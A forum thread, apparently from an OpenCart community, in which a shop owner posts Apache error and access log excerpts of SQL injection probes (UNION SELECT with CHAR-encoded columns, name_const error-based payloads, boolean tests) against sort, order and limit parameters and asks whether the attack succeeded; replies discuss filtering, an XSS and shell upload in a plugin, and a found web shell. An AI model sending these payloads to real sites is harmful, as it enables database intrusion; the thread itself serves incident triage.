Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Попытка sql injection или не попытка


Mops009

Recommended Posts

День добрый, недавно была атака, пытались делать запросы типа:

0UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20--%20/*%20order%20by%20%27as%20/*
_or_(1,2)=(select*from(select+name_const(CHAR(108,105,71,88,117,97,83,105,67,119,120),1),name_const(CHAR(108,105,71,88,117,97,83,105,67,119,120),1))a)+--+"x="= 

Скину все логи за этот день, хочется убедиться, что попытка была неудачной, либо заделать брешь на будущее.

Надіслати
Поділитися на інших сайтах


5 минут назад, markimax сказал:

Да, попытка
Но из обрывка лога не увидишь больше ничего

Лог состоит из 460 тыс строк. 

Т.к. не разбираюсь в программировании, боюсь выкладывать весь лог на форум, если бреши все таки есть - выставлять их для максимального круга лиц.

 

Если Вы можете просмотреть - могу выслать, по оплате согласуем. 

Надіслати
Поділитися на інших сайтах


Выходные что-ли у всех. Может кто посоветует человека специализирующегося на защите сайта, приобрел бы услугу анализа сайта на предмет уязвимостей.

Надіслати
Поділитися на інших сайтах


Файл error.log

	Line 192: [Tue Sep 18 15:17:35 2018] [warn] [client 176.97.36.105] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server
	Line 193: [Tue Sep 18 15:17:35 2018] [error] [client 176.97.36.105] Premature end of script headers: index.php

и

	Line 139: [Tue Sep 18 15:12:36 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45) --  /* failed
	Line 140: [Tue Sep 18 15:12:36 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45) --  /* failed
	Line 141: [Tue Sep 18 15:12:36 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45) --  /* failed
	Line 142: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45) --  /* failed
	Line 143: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45) --  /* failed
	Line 144: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45) --  /* failed
	Line 145: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45) --  /* failed
	Line 146: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45) --  /* failed
	Line 147: [Tue Sep 18 15:13:00 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45) --  /* failed
	Line 148: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45) --  /* failed
	Line 149: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45) --  /* failed
	Line 150: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45) --  /* failed
	Line 151: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45) --  /* failed
	Line 152: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45) --  /* failed
	Line 153: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45) --  /* failed
	Line 154: [Tue Sep 18 15:13:01 2018] [error] [client 176.97.36.105] (36)File name too long: access to /1111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45),CHAR(45,120,50,53,45,81,45) --  /* failed

acces.log

46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=24+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(115,122,111,77,106,116,74,78,77),1),name_const(CHAR(115,122,111,77,106,116,74,78,77),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1),name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?sort=p.sort_order&order=ASC1111111111111%22%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45)%20--%20/*%20order%20by%20%22as%20/* HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(115,122,111,77,106,116,74,78,77),1),name_const(CHAR(115,122,111,77,106,116,74,78,77),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=24+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:05 +0300] "GET /?order=ASC&sort=p.sort_order HTTP/1.0" 200 27079 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1),name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(115,122,111,77,106,116,74,78,77),1),name_const(CHAR(115,122,111,77,106,116,74,78,77),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=241111111111111"_UNION_SELECT_CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45)_--_/*_order_by_="as_/*= HTTP/1.0" 200 26801 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?limit=24+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order+and+1>1= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC'&sort=p.sort_order\" HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?order=ASC&sort=p.sort_order"_or_(1,2)=(select*from(select+name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1),name_const(CHAR(108,82,103,103,119,100,117,72,68,89),1))a)+--+"x="= HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:06 +0300] "GET /?sort=p.sort_order&order=ASC1111111111111"_UNION_SELECT_CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)_--_/*_order_by_="as_/*= HTTP/1.0" 200 26178 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
46.47.56.31 - - [18/Sep/2018:18:14:05 +0300] "GET /?limit=241111111111111"_UNION_SELECT_CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45),CHAR(45,120,49,54,45,81,45),CHAR(45,120,49,55,45,81,45),CHAR(45,120,49,56,45,81,45),CHAR(45,120,49,57,45,81,45),CHAR(45,120,50,48,45,81,45),CHAR(45,120,50,49,45,81,45),CHAR(45,120,50,50,45,81,45),CHAR(45,120,50,51,45,81,45),CHAR(45,120,50,52,45,81,45)_--_/*_order_by_="as_/*= HTTP/1.0" 200 25658 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"

 

Надіслати
Поділитися на інших сайтах


10 часов назад, Mops009 сказал:

Файл error.log

и

acces.log

 

limit, order, sort под "контролем" inject туда не сделать
opencart так просто не пробить
Так что можете спать спокойно
Но... взломать вас хотели или хотят, это факт
Если нету модулей позволяющих загружать пользователям изображения на сервер, то вряд ли что зальют
Хотя .. вот недавно, модуль Reviews PRO (с возможностью загрузки изображений)  с маркетплейс opencart.com
За пару минут сразу нашел XSS (шедевральные идиоты его делали (отписал пользователю, а он авторам, смотрю xss уже закрыли)) и залил шелл (пользователю показал)  (так и не закрыли, понятное дело если допустили XSS то  не хватает квалификации понять другие пробои, по серьезнее)
 

Надіслати
Поділитися на інших сайтах

  • 4 months later...

подниму тему.

в лоах апача тоже нашел схожее, а потом и шелл на сайте. В данный момент убрал, но есть ли еще гадость - не понятно, т.к. файл шелла был датирован вообще 17-м годом, хотя в бекапе двухнедельной давности его не был.

Чем провериться можно?

99,9%, что нашли уязвимость в движке, т.к. если бы сломали сам сервер, то смысла особого в шелле я не вижу, плюс в логах ssh нет входов с левый айпи адресов

Змінено користувачем warezliker
Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Схожі публікації

  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.